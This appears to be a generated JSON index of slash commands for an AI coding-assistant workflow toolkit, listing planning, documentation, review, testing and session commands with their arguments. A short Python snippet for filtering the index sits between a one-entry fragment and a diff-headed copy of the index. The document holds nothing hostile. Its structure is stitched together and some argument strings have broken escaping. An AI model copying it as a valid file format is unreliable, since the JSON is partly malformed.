  { "name": "style-extract", "command": "/workflow:ui-design:style-extract", "description": "Extract design style from reference images or text prompts using Claude analysis with variant generation or refinement mode", "arguments": "[--design-id <id>] [--session <id>] [--images \"<glob>\"] [--prompt \"<desc>\"] [--variants <count>] [--interactive] [--refine]", "category": "workflow", "subcategory": "ui-design", "usage_scenario": "general", "difficulty": "Intermediate", "source": "../../../commands/workflow/ui-design/style-extract.md" }
]
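For anyone who wants to query this index programmatically, a minimal sketch follows. It assumes the flat array above has been saved locally as `commands-index.json` (the file's actual name and location in the repository are not shown in this excerpt) and simply filters entries by the `category` and `difficulty` fields present in every object.

```python
import json
from pathlib import Path

# Assumption: the flat command index shown above has been saved locally as
# commands-index.json; adjust the path to wherever the generated file lives.
INDEX_PATH = Path("commands-index.json")

def load_commands(path: Path) -> list[dict]:
    """Load the flat command index (a JSON array of command objects)."""
    return json.loads(path.read_text(encoding="utf-8"))

def filter_commands(commands: list[dict], *, category: str | None = None,
                    difficulty: str | None = None) -> list[dict]:
    """Return entries matching the optional category/difficulty filters."""
    return [
        c for c in commands
        if (category is None or c["category"] == category)
        and (difficulty is None or c["difficulty"] == difficulty)
    ]

if __name__ == "__main__":
    commands = load_commands(INDEX_PATH)
    for cmd in filter_commands(commands, category="workflow", difficulty="Advanced"):
        print(f"{cmd['command']}: {cmd['description']}")
```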
@@ -1,914 +0,0 @@
{
  "cli": { "_root": [
    { "name": "cli-init", "command": "/cli:cli-init", "description": "Generate .gemini/ and .qwen/ config directories with settings.json and ignore files based on workspace technology detection", "arguments": "[--tool gemini|qwen|all] [--output path] [--preview]", "category": "cli", "subcategory": null, "usage_scenario": "general", "difficulty": "Intermediate", "source": "../../../commands/cli/cli-init.md" }
  ] },
  "general": { "_root": [
    { "name": "enhance-prompt", "command": "/enhance-prompt", "description": "Enhanced prompt transformation using session memory and intent analysis with --enhance flag detection", "arguments": "user input to enhance", "category": "general", "subcategory": null, "usage_scenario": "general", "difficulty": "Intermediate", "source": "../../../commands/enhance-prompt.md" },
    { "name": "version", "command": "/version", "description": "Display Claude Code version information and check for updates", "arguments": "", "category": "general", "subcategory": null, "usage_scenario": "general", "difficulty": "Beginner", "source": "../../../commands/version.md" }
  ] },
  "issue": { "_root": [
    { "name": "issue:discover", "command": "/issue:discover", "description": "Discover potential issues from multiple perspectives (bug, UX, test, quality, security, performance, maintainability, best-practices) using CLI explore. Supports Exa external research for security and best-practices perspectives.", "arguments": "<path-pattern> [--perspectives=bug,ux,...] [--external]", "category": "issue", "subcategory": null, "usage_scenario": "general", "difficulty": "Intermediate", "source": "../../../commands/issue/discover.md" },
    { "name": "execute", "command": "/issue:execute", "description": "Execute queue with codex using DAG-based parallel orchestration (solution-level)", "arguments": "[--worktree] [--queue <queue-id>]", "category": "issue", "subcategory": null, "usage_scenario": "implementation", "difficulty": "Intermediate", "source": "../../../commands/issue/execute.md" },
    { "name": "new", "command": "/issue:new", "description": "Create structured issue from GitHub URL or text description", "arguments": "<github-url | text-description> [--priority 1-5]", "category": "issue", "subcategory": null, "usage_scenario": "general", "difficulty": "Intermediate", "source": "../../../commands/issue/new.md" },
    { "name": "plan", "command": "/issue:plan", "description": "Batch plan issue resolution using issue-plan-agent (explore + plan closed-loop)", "arguments": "--all-pending <issue-id>[,<issue-id>,...] [--batch-size 3]", "category": "issue", "subcategory": null, "usage_scenario": "planning", "difficulty": "Intermediate", "source": "../../../commands/issue/plan.md" },
    { "name": "queue", "command": "/issue:queue", "description": "Form execution queue from bound solutions using issue-queue-agent (solution-level)", "arguments": "[--rebuild] [--issue <id>]", "category": "issue", "subcategory": null, "usage_scenario": "general", "difficulty": "Intermediate", "source": "../../../commands/issue/queue.md" }
  ] },
  "memory": { "_root": [
    { "name": "code-map-memory", "command": "/memory:code-map-memory", "description": "3-phase orchestrator: parse feature keyword → cli-explore-agent analyzes (Deep Scan dual-source) → orchestrator generates Mermaid docs + SKILL package (skips phase 2 if exists)", "arguments": "\"feature-keyword\" [--regenerate] [--tool <gemini|qwen>]", "category": "memory", "subcategory": null, "usage_scenario": "documentation", "difficulty": "Intermediate", "source": "../../../commands/memory/code-map-memory.md" },
    { "name": "compact", "command": "/memory:compact", "description": "Compact current session memory into structured text for session recovery, extracting objective/plan/files/decisions/constraints/state, and save via MCP core_memory tool", "arguments": "[optional: session description]", "category": "memory", "subcategory": null, "usage_scenario": "general", "difficulty": "Intermediate", "source": "../../../commands/memory/compact.md" },
    { "name": "docs-full-cli", "command": "/memory:docs-full-cli", "description": "Generate full project documentation using CLI execution (Layer 3→1) with batched agents (4 modules/agent) and gemini→qwen→codex fallback, <20 modules uses direct parallel", "arguments": "[path] [--tool <gemini|qwen|codex>]", "category": "memory", "subcategory": null, "usage_scenario": "documentation", "difficulty": "Intermediate", "source": "../../../commands/memory/docs-full-cli.md" },
    { "name": "docs-related-cli", "command": "/memory:docs-related-cli", "description": "Generate/update documentation for git-changed modules using CLI execution with batched agents (4 modules/agent) and gemini→qwen→codex fallback, <15 modules uses direct parallel", "arguments": "[--tool <gemini|qwen|codex>]", "category": "memory", "subcategory": null, "usage_scenario": "documentation", "difficulty": "Intermediate", "source": "../../../commands/memory/docs-related-cli.md" },
    { "name": "docs", "command": "/memory:docs", "description": "Plan documentation workflow with dynamic grouping (≤10 docs/task), generates IMPL tasks for parallel module trees, README, ARCHITECTURE, and HTTP API docs", "arguments": "[path] [--tool <gemini|qwen|codex>] [--mode <full|partial>] [--cli-execute]", "category": "memory", "subcategory": null, "usage_scenario": "documentation", "difficulty": "Intermediate", "source": "../../../commands/memory/docs.md" },
|
||||
{
|
||||
"name": "load-skill-memory",
|
||||
"command": "/memory:load-skill-memory",
|
||||
"description": "Activate SKILL package (auto-detect from paths/keywords or manual) and intelligently load documentation based on task intent keywords",
|
||||
"arguments": "[skill_name] \\\"task intent description\\",
|
||||
"category": "memory",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "documentation",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/memory/load-skill-memory.md"
|
||||
},
|
||||
{
|
||||
"name": "load",
|
||||
"command": "/memory:load",
|
||||
"description": "Delegate to universal-executor agent to analyze project via Gemini/Qwen CLI and return JSON core content package for task context",
|
||||
"arguments": "[--tool gemini|qwen] \\\"task context description\\",
|
||||
"category": "memory",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/memory/load.md"
|
||||
},
|
||||
{
|
||||
"name": "skill-memory",
|
||||
"command": "/memory:skill-memory",
|
||||
"description": "4-phase autonomous orchestrator: check docs → /memory:docs planning → /workflow:execute → generate SKILL.md with progressive loading index (skips phases 2-3 if docs exist)",
|
||||
"arguments": "[path] [--tool <gemini|qwen|codex>] [--regenerate] [--mode <full|partial>] [--cli-execute]",
|
||||
"category": "memory",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "documentation",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/memory/skill-memory.md"
|
||||
},
|
||||
{
|
||||
"name": "style-skill-memory",
|
||||
"command": "/memory:style-skill-memory",
|
||||
"description": "Generate SKILL memory package from style reference for easy loading and consistent design system usage",
|
||||
"arguments": "[package-name] [--regenerate]",
|
||||
"category": "memory",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "documentation",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/memory/style-skill-memory.md"
|
||||
},
|
||||
{
|
||||
"name": "swagger-docs",
|
||||
"command": "/memory:swagger-docs",
|
||||
"description": "Generate complete Swagger/OpenAPI documentation following RESTful standards with global security, API details, error codes, and validation tests",
|
||||
"arguments": "[path] [--tool <gemini|qwen|codex>] [--format <yaml|json>] [--version <v3.0|v3.1>] [--lang <zh|en>]",
|
||||
"category": "memory",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "documentation",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/memory/swagger-docs.md"
|
||||
},
|
||||
{
|
||||
"name": "tech-research-rules",
|
||||
"command": "/memory:tech-research-rules",
|
||||
"description": "3-phase orchestrator: extract tech stack → Exa research → generate path-conditional rules (auto-loaded by Claude Code)",
|
||||
"arguments": "[session-id | tech-stack-name] [--regenerate] [--tool <gemini|qwen>]",
|
||||
"category": "memory",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/memory/tech-research-rules.md"
|
||||
},
|
||||
{
|
||||
"name": "update-full",
|
||||
"command": "/memory:update-full",
|
||||
"description": "Update all CLAUDE.md files using layer-based execution (Layer 3→1) with batched agents (4 modules/agent) and gemini→qwen→codex fallback, <20 modules uses direct parallel",
|
||||
"arguments": "[--tool gemini|qwen|codex] [--path <directory>]",
|
||||
"category": "memory",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/memory/update-full.md"
|
||||
},
|
||||
{
|
||||
"name": "update-related",
|
||||
"command": "/memory:update-related",
|
||||
"description": "Update CLAUDE.md for git-changed modules using batched agent execution (4 modules/agent) with gemini→qwen→codex fallback, <15 modules uses direct execution",
|
||||
"arguments": "[--tool gemini|qwen|codex]",
|
||||
"category": "memory",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/memory/update-related.md"
|
||||
},
|
||||
{
|
||||
"name": "workflow-skill-memory",
|
||||
"command": "/memory:workflow-skill-memory",
|
||||
"description": "Process WFS-* archived sessions using universal-executor agents with Gemini analysis to generate workflow-progress SKILL package (sessions-timeline, lessons, conflicts)",
|
||||
"arguments": "session <session-id> | all",
|
||||
"category": "memory",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "documentation",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/memory/workflow-skill-memory.md"
|
||||
}
|
||||
]
|
||||
},
|
||||
"task": {
|
||||
"_root": [
|
||||
{
|
||||
"name": "breakdown",
|
||||
"command": "/task:breakdown",
|
||||
"description": "Decompose complex task into subtasks with dependency mapping, creates child task JSONs with parent references and execution order",
|
||||
"arguments": "task-id",
|
||||
"category": "task",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "planning",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/task/breakdown.md"
|
||||
},
|
||||
{
|
||||
"name": "create",
|
||||
"command": "/task:create",
|
||||
"description": "Generate task JSON from natural language description with automatic file pattern detection, scope inference, and dependency analysis",
|
||||
"arguments": "\\\"task title\\",
|
||||
"category": "task",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "implementation",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/task/create.md"
|
||||
},
|
||||
{
|
||||
"name": "execute",
|
||||
"command": "/task:execute",
|
||||
"description": "Execute task JSON using appropriate agent (@doc-generator/@implementation-agent/@test-agent) with pre-analysis context loading and status tracking",
|
||||
"arguments": "task-id",
|
||||
"category": "task",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "implementation",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/task/execute.md"
|
||||
},
|
||||
{
|
||||
"name": "replan",
|
||||
"command": "/task:replan",
|
||||
"description": "Update task JSON with new requirements or batch-update multiple tasks from verification report, tracks changes in task-changes.json",
|
||||
"arguments": "task-id [\\\"text\\\"|file.md] | --batch [verification-report.md]",
|
||||
"category": "task",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "planning",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/task/replan.md"
|
||||
}
|
||||
]
|
||||
},
|
||||
"workflow": {
|
||||
"_root": [
|
||||
{
|
||||
"name": "action-plan-verify",
|
||||
"command": "/workflow:action-plan-verify",
|
||||
"description": "Perform non-destructive cross-artifact consistency analysis between IMPL_PLAN.md and task JSONs with quality gate validation",
|
||||
"arguments": "[optional: --session session-id]",
|
||||
"category": "workflow",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "planning",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/action-plan-verify.md"
|
||||
},
|
||||
{
|
||||
"name": "clean",
|
||||
"command": "/workflow:clean",
|
||||
"description": "Intelligent code cleanup with mainline detection, stale artifact discovery, and safe execution",
|
||||
"arguments": "[--dry-run] [\\\"focus area\\\"]",
|
||||
"category": "workflow",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/clean.md"
|
||||
},
|
||||
{
|
||||
"name": "debug",
|
||||
"command": "/workflow:debug",
|
||||
"description": "Interactive hypothesis-driven debugging with NDJSON logging, iterative until resolved",
|
||||
"arguments": "\\\"bug description or error message\\",
|
||||
"category": "workflow",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/debug.md"
|
||||
},
|
||||
{
|
||||
"name": "execute",
|
||||
"command": "/workflow:execute",
|
||||
"description": "Coordinate agent execution for workflow tasks with automatic session discovery, parallel task processing, and status tracking",
|
||||
"arguments": "[--resume-session=\\\"session-id\\\"]",
|
||||
"category": "workflow",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "implementation",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/execute.md"
|
||||
},
|
||||
{
|
||||
"name": "init",
|
||||
"command": "/workflow:init",
|
||||
"description": "Initialize project-level state with intelligent project analysis using cli-explore-agent",
|
||||
"arguments": "[--regenerate]",
|
||||
"category": "workflow",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/init.md"
|
||||
},
|
||||
{
|
||||
"name": "lite-execute",
|
||||
"command": "/workflow:lite-execute",
|
||||
"description": "Execute tasks based on in-memory plan, prompt description, or file content",
|
||||
"arguments": "[--in-memory] [\\\"task description\\\"|file-path]",
|
||||
"category": "workflow",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "implementation",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/lite-execute.md"
|
||||
},
|
||||
{
|
||||
"name": "lite-fix",
|
||||
"command": "/workflow:lite-fix",
|
||||
"description": "Lightweight bug diagnosis and fix workflow with intelligent severity assessment and optional hotfix mode for production incidents",
|
||||
"arguments": "[--hotfix] \\\"bug description or issue reference\\",
|
||||
"category": "workflow",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/lite-fix.md"
|
||||
},
|
||||
{
|
||||
"name": "lite-plan",
|
||||
"command": "/workflow:lite-plan",
|
||||
"description": "Lightweight interactive planning workflow with in-memory planning, code exploration, and execution dispatch to lite-execute after user confirmation",
|
||||
"arguments": "[-e|--explore] \\\"task description\\\"|file.md",
|
||||
"category": "workflow",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "planning",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/lite-plan.md"
|
||||
},
|
||||
{
|
||||
"name": "plan",
|
||||
"command": "/workflow:plan",
|
||||
"description": "5-phase planning workflow with action-planning-agent task generation, outputs IMPL_PLAN.md and task JSONs",
|
||||
"arguments": "\\\"text description\\\"|file.md",
|
||||
"category": "workflow",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "planning",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/plan.md"
|
||||
},
|
||||
{
|
||||
"name": "replan",
|
||||
"command": "/workflow:replan",
|
||||
"description": "Interactive workflow replanning with session-level artifact updates and boundary clarification through guided questioning",
|
||||
"arguments": "[--session session-id] [task-id] \\\"requirements\\\"|file.md [--interactive]",
|
||||
"category": "workflow",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "planning",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/replan.md"
|
||||
},
|
||||
{
|
||||
"name": "review-fix",
|
||||
"command": "/workflow:review-fix",
|
||||
"description": "Automated fixing of code review findings with AI-powered planning and coordinated execution. Uses intelligent grouping, multi-stage timeline coordination, and test-driven verification.",
|
||||
"arguments": "<export-file|review-dir> [--resume] [--max-iterations=N]",
|
||||
"category": "workflow",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "analysis",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/review-fix.md"
|
||||
},
|
||||
{
|
||||
"name": "review-module-cycle",
|
||||
"command": "/workflow:review-module-cycle",
|
||||
"description": "Independent multi-dimensional code review for specified modules/files. Analyzes specific code paths across 7 dimensions with hybrid parallel-iterative execution, independent of workflow sessions.",
|
||||
"arguments": "<path-pattern> [--dimensions=security,architecture,...] [--max-iterations=N]",
|
||||
"category": "workflow",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "analysis",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/review-module-cycle.md"
|
||||
},
|
||||
{
|
||||
"name": "review-session-cycle",
|
||||
"command": "/workflow:review-session-cycle",
|
||||
"description": "Session-based comprehensive multi-dimensional code review. Analyzes git changes from workflow session across 7 dimensions with hybrid parallel-iterative execution, aggregates findings, and performs focused deep-dives on critical issues until quality gates met.",
|
||||
"arguments": "[session-id] [--dimensions=security,architecture,...] [--max-iterations=N]",
|
||||
"category": "workflow",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "session-management",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/review-session-cycle.md"
|
||||
},
|
||||
{
|
||||
"name": "review",
|
||||
"command": "/workflow:review",
|
||||
"description": "Post-implementation review with specialized types (security/architecture/action-items/quality) using analysis agents and Gemini",
|
||||
"arguments": "[--type=security|architecture|action-items|quality] [--archived] [optional: session-id]",
|
||||
"category": "workflow",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "analysis",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/review.md"
|
||||
},
|
||||
{
|
||||
"name": "tdd-plan",
|
||||
"command": "/workflow:tdd-plan",
|
||||
"description": "TDD workflow planning with Red-Green-Refactor task chain generation, test-first development structure, and cycle tracking",
|
||||
"arguments": "\\\"feature description\\\"|file.md",
|
||||
"category": "workflow",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "planning",
|
||||
"difficulty": "Advanced",
|
||||
"source": "../../../commands/workflow/tdd-plan.md"
|
||||
},
|
||||
{
|
||||
"name": "tdd-verify",
|
||||
"command": "/workflow:tdd-verify",
|
||||
"description": "Verify TDD workflow compliance against Red-Green-Refactor cycles, generate quality report with coverage analysis",
|
||||
"arguments": "[optional: WFS-session-id]",
|
||||
"category": "workflow",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "testing",
|
||||
"difficulty": "Advanced",
|
||||
"source": "../../../commands/workflow/tdd-verify.md"
|
||||
},
|
||||
{
|
||||
"name": "test-cycle-execute",
|
||||
"command": "/workflow:test-cycle-execute",
|
||||
"description": "Execute test-fix workflow with dynamic task generation and iterative fix cycles until test pass rate >= 95% or max iterations reached. Uses @cli-planning-agent for failure analysis and task generation.",
|
||||
"arguments": "[--resume-session=\\\"session-id\\\"] [--max-iterations=N]",
|
||||
"category": "workflow",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "implementation",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/test-cycle-execute.md"
|
||||
},
|
||||
{
|
||||
"name": "test-fix-gen",
|
||||
"command": "/workflow:test-fix-gen",
|
||||
"description": "Create test-fix workflow session from session ID, description, or file path with test strategy generation and task planning",
|
||||
"arguments": "(source-session-id | \\\"feature description\\\" | /path/to/file.md)",
|
||||
"category": "workflow",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "testing",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/test-fix-gen.md"
|
||||
},
|
||||
{
|
||||
"name": "test-gen",
|
||||
"command": "/workflow:test-gen",
|
||||
"description": "Create independent test-fix workflow session from completed implementation session, analyzes code to generate test tasks",
|
||||
"arguments": "source-session-id",
|
||||
"category": "workflow",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "testing",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/test-gen.md"
|
||||
}
|
||||
],
|
||||
"brainstorm": [
|
||||
{
|
||||
"name": "api-designer",
|
||||
"command": "/workflow:brainstorm:api-designer",
|
||||
"description": "Generate or update api-designer/analysis.md addressing guidance-specification discussion points for API design perspective",
|
||||
"arguments": "optional topic - uses existing framework if available",
|
||||
"category": "workflow",
|
||||
"subcategory": "brainstorm",
|
||||
"usage_scenario": "planning",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/brainstorm/api-designer.md"
|
||||
},
|
||||
{
|
||||
"name": "artifacts",
|
||||
"command": "/workflow:brainstorm:artifacts",
|
||||
"description": "Interactive clarification generating confirmed guidance specification through role-based analysis and synthesis",
|
||||
"arguments": "topic or challenge description [--count N]",
|
||||
"category": "workflow",
|
||||
"subcategory": "brainstorm",
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/brainstorm/artifacts.md"
|
||||
},
|
||||
{
|
||||
"name": "auto-parallel",
|
||||
"command": "/workflow:brainstorm:auto-parallel",
|
||||
"description": "Parallel brainstorming automation with dynamic role selection and concurrent execution across multiple perspectives",
|
||||
"arguments": "topic or challenge description\" [--count N]",
|
||||
"category": "workflow",
|
||||
"subcategory": "brainstorm",
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Advanced",
|
||||
"source": "../../../commands/workflow/brainstorm/auto-parallel.md"
|
||||
},
|
||||
{
|
||||
"name": "data-architect",
|
||||
"command": "/workflow:brainstorm:data-architect",
|
||||
"description": "Generate or update data-architect/analysis.md addressing guidance-specification discussion points for data architecture perspective",
|
||||
"arguments": "optional topic - uses existing framework if available",
|
||||
"category": "workflow",
|
||||
"subcategory": "brainstorm",
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/brainstorm/data-architect.md"
|
||||
},
|
||||
{
|
||||
"name": "product-manager",
|
||||
"command": "/workflow:brainstorm:product-manager",
|
||||
"description": "Generate or update product-manager/analysis.md addressing guidance-specification discussion points for product management perspective",
|
||||
"arguments": "optional topic - uses existing framework if available",
|
||||
"category": "workflow",
|
||||
"subcategory": "brainstorm",
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/brainstorm/product-manager.md"
|
||||
},
|
||||
{
|
||||
"name": "product-owner",
|
||||
"command": "/workflow:brainstorm:product-owner",
|
||||
"description": "Generate or update product-owner/analysis.md addressing guidance-specification discussion points for product ownership perspective",
|
||||
"arguments": "optional topic - uses existing framework if available",
|
||||
"category": "workflow",
|
||||
"subcategory": "brainstorm",
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/brainstorm/product-owner.md"
|
||||
},
|
||||
{
|
||||
"name": "scrum-master",
|
||||
"command": "/workflow:brainstorm:scrum-master",
|
||||
"description": "Generate or update scrum-master/analysis.md addressing guidance-specification discussion points for Agile process perspective",
|
||||
"arguments": "optional topic - uses existing framework if available",
|
||||
"category": "workflow",
|
||||
"subcategory": "brainstorm",
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/brainstorm/scrum-master.md"
|
||||
},
|
||||
{
|
||||
"name": "subject-matter-expert",
|
||||
"command": "/workflow:brainstorm:subject-matter-expert",
|
||||
"description": "Generate or update subject-matter-expert/analysis.md addressing guidance-specification discussion points for domain expertise perspective",
|
||||
"arguments": "optional topic - uses existing framework if available",
|
||||
"category": "workflow",
|
||||
"subcategory": "brainstorm",
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/brainstorm/subject-matter-expert.md"
|
||||
},
|
||||
{
|
||||
"name": "synthesis",
|
||||
"command": "/workflow:brainstorm:synthesis",
|
||||
"description": "Clarify and refine role analyses through intelligent Q&A and targeted updates with synthesis agent",
|
||||
"arguments": "[optional: --session session-id]",
|
||||
"category": "workflow",
|
||||
"subcategory": "brainstorm",
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Advanced",
|
||||
"source": "../../../commands/workflow/brainstorm/synthesis.md"
|
||||
},
|
||||
{
|
||||
"name": "system-architect",
|
||||
"command": "/workflow:brainstorm:system-architect",
|
||||
"description": "Generate or update system-architect/analysis.md addressing guidance-specification discussion points for system architecture perspective",
|
||||
"arguments": "optional topic - uses existing framework if available",
|
||||
"category": "workflow",
|
||||
"subcategory": "brainstorm",
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/brainstorm/system-architect.md"
|
||||
},
|
||||
{
|
||||
"name": "ui-designer",
|
||||
"command": "/workflow:brainstorm:ui-designer",
|
||||
"description": "Generate or update ui-designer/analysis.md addressing guidance-specification discussion points for UI design perspective",
|
||||
"arguments": "optional topic - uses existing framework if available",
|
||||
"category": "workflow",
|
||||
"subcategory": "brainstorm",
|
||||
"usage_scenario": "planning",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/brainstorm/ui-designer.md"
|
||||
},
|
||||
{
|
||||
"name": "ux-expert",
|
||||
"command": "/workflow:brainstorm:ux-expert",
|
||||
"description": "Generate or update ux-expert/analysis.md addressing guidance-specification discussion points for UX perspective",
|
||||
"arguments": "optional topic - uses existing framework if available",
|
||||
"category": "workflow",
|
||||
"subcategory": "brainstorm",
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/brainstorm/ux-expert.md"
|
||||
}
|
||||
],
|
||||
"session": [
|
||||
{
|
||||
"name": "complete",
|
||||
"command": "/workflow:session:complete",
|
||||
"description": "Mark active workflow session as complete, archive with lessons learned, update manifest, remove active flag",
|
||||
"arguments": "",
|
||||
"category": "workflow",
|
||||
"subcategory": "session",
|
||||
"usage_scenario": "session-management",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/session/complete.md"
|
||||
},
|
||||
{
|
||||
"name": "list",
|
||||
"command": "/workflow:session:list",
|
||||
"description": "List all workflow sessions with status filtering, shows session metadata and progress information",
|
||||
"arguments": "",
|
||||
"category": "workflow",
|
||||
"subcategory": "session",
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Beginner",
|
||||
"source": "../../../commands/workflow/session/list.md"
|
||||
},
|
||||
{
|
||||
"name": "resume",
|
||||
"command": "/workflow:session:resume",
|
||||
"description": "Resume the most recently paused workflow session with automatic session discovery and status update",
|
||||
"arguments": "",
|
||||
"category": "workflow",
|
||||
"subcategory": "session",
|
||||
"usage_scenario": "session-management",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/session/resume.md"
|
||||
},
|
||||
{
|
||||
"name": "solidify",
|
||||
"command": "/workflow:session:solidify",
|
||||
"description": "Crystallize session learnings and user-defined constraints into permanent project guidelines",
|
||||
"arguments": "[--type <convention|constraint|learning>] [--category <category>] \\\"rule or insight\\",
|
||||
"category": "workflow",
|
||||
"subcategory": "session",
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/session/solidify.md"
|
||||
},
|
||||
{
|
||||
"name": "start",
|
||||
"command": "/workflow:session:start",
|
||||
"description": "Discover existing sessions or start new workflow session with intelligent session management and conflict detection",
|
||||
"arguments": "[--type <workflow|review|tdd|test|docs>] [--auto|--new] [optional: task description for new session]",
|
||||
"category": "workflow",
|
||||
"subcategory": "session",
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/session/start.md"
|
||||
}
|
||||
],
|
||||
"tools": [
|
||||
{
|
||||
"name": "conflict-resolution",
|
||||
"command": "/workflow:tools:conflict-resolution",
|
||||
"description": "Detect and resolve conflicts between plan and existing codebase using CLI-powered analysis with Gemini/Qwen",
|
||||
"arguments": "--session WFS-session-id --context path/to/context-package.json",
|
||||
"category": "workflow",
|
||||
"subcategory": "tools",
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Advanced",
|
||||
"source": "../../../commands/workflow/tools/conflict-resolution.md"
|
||||
},
|
||||
{
|
||||
"name": "gather",
|
||||
"command": "/workflow:tools:gather",
|
||||
"description": "Intelligently collect project context using context-search-agent based on task description, packages into standardized JSON",
|
||||
"arguments": "--session WFS-session-id \\\"task description\\",
|
||||
"category": "workflow",
|
||||
"subcategory": "tools",
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/tools/context-gather.md"
|
||||
},
|
||||
{
|
||||
"name": "task-generate-agent",
|
||||
"command": "/workflow:tools:task-generate-agent",
|
||||
"description": "Generate implementation plan documents (IMPL_PLAN.md, task JSONs, TODO_LIST.md) using action-planning-agent - produces planning artifacts, does NOT execute code implementation",
|
||||
"arguments": "--session WFS-session-id",
|
||||
"category": "workflow",
|
||||
"subcategory": "tools",
|
||||
"usage_scenario": "implementation",
|
||||
"difficulty": "Advanced",
|
||||
"source": "../../../commands/workflow/tools/task-generate-agent.md"
|
||||
},
|
||||
{
|
||||
"name": "task-generate-tdd",
|
||||
"command": "/workflow:tools:task-generate-tdd",
|
||||
"description": "Autonomous TDD task generation using action-planning-agent with Red-Green-Refactor cycles, test-first structure, and cycle validation",
|
||||
"arguments": "--session WFS-session-id",
|
||||
"category": "workflow",
|
||||
"subcategory": "tools",
|
||||
"usage_scenario": "implementation",
|
||||
"difficulty": "Advanced",
|
||||
